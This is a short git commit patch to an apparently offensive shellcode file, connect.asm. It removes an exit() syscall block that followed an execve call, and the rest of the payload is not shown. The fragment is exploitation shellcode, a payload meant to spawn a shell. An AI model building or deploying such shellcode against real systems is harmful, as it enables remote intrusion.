From 31bc5fef31186f02b98b07c529fd389ac4d1b9b4 Mon Sep 17 00:00:00 2001 From: toni Date: Mon, 13 Apr 2015 17:33:25 +0200 Subject: x86-64 connect shellcode --- shellcode/connect.asm | 6 ------ 1 file changed, 6 deletions(-) (limited to 'shellcode/connect.asm') diff --git a/shellcode/connect.asm b/shellcode/connect.asm index 3464a3e..fe5002a 100644 --- a/shellcode/connect.asm +++ b/shellcode/connect.asm @@ -58,9 +58,3 @@ mov ebx,esp ; arg mov byte [esp + 8], al ; null-terminate the string mov al,0xb ; execve syscall int 0x80 - -; exit() -mov al,0x1 ; exit syscall -xor ebx,ebx -mov bl,0x42 ; return code -int 0x80 ; kernel mode -- cgit v1.2.3